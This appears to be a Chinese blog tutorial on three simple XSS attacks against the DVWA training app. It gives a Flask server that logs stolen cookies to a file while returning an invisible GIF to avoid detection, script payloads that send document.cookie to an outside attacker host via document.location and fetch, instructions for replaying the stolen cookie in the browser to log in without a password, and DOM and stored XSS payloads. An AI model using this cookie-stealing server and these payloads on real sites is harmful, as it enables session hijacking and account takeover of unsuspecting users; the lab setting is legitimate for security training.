3种XSS攻击简单案例

1、接收cookie端攻击机上用python写个接收web程序flask

python 复制代码
from flask import Flask, request, Response

app = Flask(__name__)

@app.route('/')
def save_cookie():
    cookie = request.args.get('cookie', '')
    if cookie:
        with open('/root/cookies.txt', 'a') as f:
            f.write(f"{cookie}\n")
    
    # 返回1x1透明GIF(避免被用户察觉)
    return Response(b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;',  mimetype='image/gif')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

2、dvwa靶机上进行xss测试(3种方法)

php 复制代码
<script>document.location='http://192.168.168.130/?cookie='+document.cookie;</script>
<script>fetch('http://192.168.168.130/?cookie=' + document.cookie);</script>

3、把获取的cookie中最后一个等号后面的是cookie值,打开火狐按F12,点击存储store,把获取的cookie值替换进去,就能直接打开不用账户密码了

???

dvwa中DOM型注入(直接在xss的dom网址上改后面的default=就能获取cookie)

php 复制代码
http://192.168.168.133/dvwa-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>

???

dvwa中存储型注入(先按F12把name表单长度改长一点)

name中输入:

php 复制代码
<script>alert(document.cookie);</script>

message中随便输入:Payload

以后每次打开这个存储型页面就会弹cookie出来

相关推荐
yinuo15 小时前
前端跨页面通信终极指南:方案拆解、对比分析
前端
yinuo16 小时前
前端跨页面通讯终极指南⑨:IndexedDB 用法全解析
前端
xkxnq16 小时前
第二阶段:Vue 组件化开发(第 16天)
前端·javascript·vue.js
烛阴16 小时前
拒绝配置地狱!5 分钟搭建 Three.js + Parcel 完美开发环境
前端·webgl·three.js
xkxnq17 小时前
第一阶段:Vue 基础入门(第 15天)
前端·javascript·vue.js
anyup18 小时前
2026第一站:分享我在高德大赛现场学到的技术、产品与心得
前端·架构·harmonyos
BBBBBAAAAAi18 小时前
Claude Code安装记录
开发语言·前端·javascript
xiaolyuh12318 小时前
【XXL-JOB】 GLUE模式 底层实现原理
java·开发语言·前端·python·xxl-job
源码获取_wx:Fegn089518 小时前
基于 vue智慧养老院系统
开发语言·前端·javascript·vue.js·spring boot·后端·课程设计
毕设十刻18 小时前
基于Vue的人事管理系统67zzz(程序 + 源码 + 数据库 + 调试部署 + 开发环境配置),配套论文文档字数达万字以上,文末可获取,系统界面展示置于文末
前端·数据库·vue.js